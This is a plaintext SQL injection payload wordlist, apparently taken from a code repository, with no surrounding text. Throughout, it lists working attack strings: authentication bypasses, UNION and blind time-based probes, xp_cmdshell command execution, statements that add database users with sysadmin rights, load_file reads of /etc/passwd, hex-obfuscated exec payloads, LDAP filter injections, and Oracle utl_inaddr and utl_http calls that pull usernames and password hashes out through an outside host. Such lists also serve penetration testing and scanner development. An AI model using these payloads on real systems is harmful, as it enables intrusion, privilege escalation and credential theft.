328 lines
15 KiB
Plaintext
328 lines
15 KiB
Plaintext
'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' --
|
||
'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' --
|
||
'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' --
|
||
'; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' --
|
||
'; if not(select system_user) <> 'sa' waitfor delay '0:0:2' --
|
||
'; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' --
|
||
'; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' --
|
||
'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' --
|
||
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
|
||
'create user name identified by 'pass123' --
|
||
'create user name identified by pass123 temporary tablespace temp default tablespace users;
|
||
' ; drop table temp --
|
||
'exec sp_addlogin 'name' , 'password' --
|
||
' exec sp_addsrvrolemember 'name' , 'sysadmin' --
|
||
' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --
|
||
' grant connect to name; grant resource to name; --
|
||
' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)
|
||
' or 1=1 --
|
||
' union (select @@version) --
|
||
' union (select NULL, (select @@version)) --
|
||
' union (select NULL, NULL, (select @@version)) --
|
||
' union (select NULL, NULL, NULL, (select @@version)) --
|
||
' union (select NULL, NULL, NULL, NULL, (select @@version)) --
|
||
' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) --
|
||
<>"'%;)(&+
|
||
|
|
||
!
|
||
?
|
||
/
|
||
//
|
||
//*
|
||
'
|
||
' --
|
||
(
|
||
)
|
||
*|
|
||
*/*
|
||
&
|
||
0
|
||
031003000270000
|
||
0 or 1=1
|
||
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
|
||
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A
|
||
0x77616974666F722064656C61792027303A303A31302700 exec(@s)
|
||
1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
|
||
1 or 1=1
|
||
1;SELECT%20*
|
||
1 waitfor delay '0:0:10'--
|
||
'%20or%20''='
|
||
'%20or%201=1
|
||
')%20or%20('x'='x
|
||
'%20or%20'x'='x
|
||
%20or%20x=x
|
||
%20'sleep%2050'
|
||
%20$(sleep%2050)
|
||
%21
|
||
23 OR 1=1
|
||
%26
|
||
%27%20or%201=1
|
||
%28
|
||
%29
|
||
%2A%28%7C%28mail%3D%2A%29%29
|
||
%2A%28%7C%28objectclass%3D%2A%29%29
|
||
%2A%7C
|
||
||6
|
||
'||'6
|
||
(||6)
|
||
%7C
|
||
a'
|
||
admin' or '
|
||
' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
|
||
' and 1 in (select var from temp)--
|
||
anything' OR 'x'='x
|
||
"a"" or 1=1--"
|
||
a' or 1=1--
|
||
"a"" or 3=3--"
|
||
a' or 3=3--
|
||
a' or 'a' = 'a
|
||
'%20OR
|
||
as
|
||
asc
|
||
a' waitfor delay '0:0:10'--
|
||
'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login >
|
||
bfilename
|
||
char%4039%41%2b%40SELECT
|
||
declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
|
||
declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
|
||
declare @q nvarchar (4000) select @q =
|
||
declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
|
||
declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
|
||
declare @s varchar(22) select @s =
|
||
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e
|
||
delete
|
||
desc
|
||
distinct
|
||
'||(elt(-3+5,bin(15),ord(10),hex(char(45))))
|
||
'; exec master..xp_cmdshell
|
||
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
|
||
exec(@s)
|
||
'; exec ('sel' + 'ect us' + 'er')
|
||
exec sp
|
||
'; execute immediate 'sel' || 'ect us' || 'er'
|
||
exec xp
|
||
'; exec xp_regread
|
||
' group by userid having 1=1--
|
||
handler
|
||
having
|
||
' having 1=1--
|
||
hi or 1=1 --"
|
||
hi' or 1=1 --
|
||
"hi"") or (""a""=""a"
|
||
hi or a=a
|
||
hi' or 'a'='a
|
||
hi') or ('a'='a
|
||
'hi' or 'x'='x';
|
||
insert
|
||
like
|
||
limit
|
||
*(|(mail=*))
|
||
*(|(objectclass=*))
|
||
or
|
||
' or ''='
|
||
or 0=0 #"
|
||
' or 0=0 --
|
||
' or 0=0 #
|
||
" or 0=0 --
|
||
or 0=0 --
|
||
or 0=0 #
|
||
' or 1 --'
|
||
' or 1/*
|
||
; or '1'='1'
|
||
' or '1'='1
|
||
' or '1'='1'--
|
||
' or 1=1
|
||
' or 1=1 /*
|
||
' or 1=1--
|
||
' or 1=1--
|
||
'/**/or/**/1/**/=/**/1
|
||
‘ or 1=1 --
|
||
" or 1=1--
|
||
or 1=1
|
||
or 1=1--
|
||
or 1=1 or ""=
|
||
' or 1=1 or ''='
|
||
' or 1 in (select @@version)--
|
||
or%201=1
|
||
or%201=1 --
|
||
' or 2 > 1
|
||
' or 2 between 1 and 3
|
||
' or 3=3
|
||
‘ or 3=3 --
|
||
' or '7659'='7659
|
||
or a=a
|
||
or a = a
|
||
' or 'a'='a
|
||
' or a=a--
|
||
') or ('a'='a
|
||
" or "a"="a
|
||
) or (a=a
|
||
order by
|
||
' or (EXISTS)
|
||
or isNULL(1/0) /*
|
||
" or isNULL(1/0) /*
|
||
' or 'something' like 'some%'
|
||
' or 'something' = 'some'+'thing'
|
||
' or 'text' = n'text'
|
||
' or 'text' > 't'
|
||
' or uid like '%
|
||
' or uname like '%
|
||
' or 'unusual' = 'unusual'
|
||
' or userid like '%
|
||
' or user like '%
|
||
' or username like '%
|
||
' or username like char(37);
|
||
' or 'whatever' in ('whatever')
|
||
' -- &password=
|
||
password:*/=1--
|
||
PRINT
|
||
PRINT @@variable
|
||
procedure
|
||
replace
|
||
select
|
||
' select * from information_schema.tables--
|
||
' select name from syscolumns where id = (select id from sysobjects where name = tablename')--
|
||
' (select top 1
|
||
--sp_password
|
||
'sqlattempt1
|
||
(sqlattempt2)
|
||
'sqlvuln
|
||
'+sqlvuln
|
||
(sqlvuln)
|
||
sqlvuln;
|
||
t'exec master..xp_cmdshell 'nslookup www.google.com'--
|
||
to_timestamp_tz
|
||
truncate
|
||
tz_offset
|
||
' UNION ALL SELECT
|
||
' union all select @@version--
|
||
' union select
|
||
uni/**/on sel/**/ect
|
||
' UNION SELECT
|
||
' union select 1,load_file('/etc/passwd'),1,1,1;
|
||
) union select * from information_schema.tables;
|
||
' union select * from users where login = char(114,111,111,116);
|
||
update
|
||
'||UTL_HTTP.REQUEST
|
||
,@variable
|
||
@variable
|
||
@var select @var as var into temp end --
|
||
\x27UNION SELECT
|
||
x' AND 1=(SELECT COUNT(*) FROM tabname); --
|
||
x' AND email IS NULL; --
|
||
x' AND members.email IS NULL; --
|
||
x' AND userid IS NULL; --
|
||
x' or 1=1 or 'x'='y
|
||
x' OR full_name LIKE '%Bob%
|
||
ý or 1=1 --
|
||
sleep(__TIME__)#
|
||
1 or sleep(__TIME__)#
|
||
" or sleep(__TIME__)#
|
||
' or sleep(__TIME__)#
|
||
" or sleep(__TIME__)="
|
||
' or sleep(__TIME__)='
|
||
1) or sleep(__TIME__)#
|
||
") or sleep(__TIME__)="
|
||
') or sleep(__TIME__)='
|
||
1)) or sleep(__TIME__)#
|
||
")) or sleep(__TIME__)="
|
||
')) or sleep(__TIME__)='
|
||
;waitfor delay '0:0:__TIME__'--
|
||
);waitfor delay '0:0:__TIME__'--
|
||
';waitfor delay '0:0:__TIME__'--
|
||
";waitfor delay '0:0:__TIME__'--
|
||
');waitfor delay '0:0:__TIME__'--
|
||
");waitfor delay '0:0:__TIME__'--
|
||
));waitfor delay '0:0:__TIME__'--
|
||
'));waitfor delay '0:0:__TIME__'--
|
||
"));waitfor delay '0:0:__TIME__'--
|
||
benchmark(10000000,MD5(1))#
|
||
1 or benchmark(10000000,MD5(1))#
|
||
" or benchmark(10000000,MD5(1))#
|
||
' or benchmark(10000000,MD5(1))#
|
||
1) or benchmark(10000000,MD5(1))#
|
||
") or benchmark(10000000,MD5(1))#
|
||
') or benchmark(10000000,MD5(1))#
|
||
1)) or benchmark(10000000,MD5(1))#
|
||
")) or benchmark(10000000,MD5(1))#
|
||
')) or benchmark(10000000,MD5(1))#
|
||
pg_sleep(__TIME__)--
|
||
1 or pg_sleep(__TIME__)--
|
||
" or pg_sleep(__TIME__)--
|
||
' or pg_sleep(__TIME__)--
|
||
1) or pg_sleep(__TIME__)--
|
||
") or pg_sleep(__TIME__)--
|
||
') or pg_sleep(__TIME__)--
|
||
1)) or pg_sleep(__TIME__)--
|
||
")) or pg_sleep(__TIME__)--
|
||
')) or pg_sleep(__TIME__)--
|
||
1'1
|
||
1 exec sp_ (or exec xp_)
|
||
1 and 1=1
|
||
1' and 1=(select count(*) from tablenames); --
|
||
1 or 1=1
|
||
1' or '1'='1
|
||
1
|
||
1 and user_name() = 'dbo'
|
||
\'; desc users; --
|
||
1\'1
|
||
1' and non_existant_table = '1
|
||
' or username is not NULL or username = '
|
||
1 and ascii(lower(substring((select top 1 name from sysobjects where xtype='u'), 1, 1))) > 116
|
||
1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = 'u' --
|
||
1 uni/**/on select all from where
|
||
’ or ‘1’=’1
|
||
' or '1'='1
|
||
'||utl_http.request('httP://192.168.1.1/')||'
|
||
' || myappadmin.adduser('admin', 'newpass') || '
|
||
' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT SYS.LOGIN_USER FROM DUAL)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT SYS.DATABASE_NAME FROM DUAL)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT host_name FROM v$instance)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(table_name)) FROM sys.all_tables)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(column_name)) FROM sys.all_tab_columns)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE=SYS.LOGIN_USER)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=1)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=1)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=1)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=1)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=2)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=2)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=2)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=2)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=2)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=3)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=3)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=3)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=3)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=3)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=4)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=4)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=4)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=4)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=4)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=5)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=5)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=5)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=5)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=5)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=6)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=6)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=6)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=6)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=6)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=7)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=7)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=7)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=7)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=7)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=8)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=8)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=8)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=8)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=8)) AND 'i'='i
|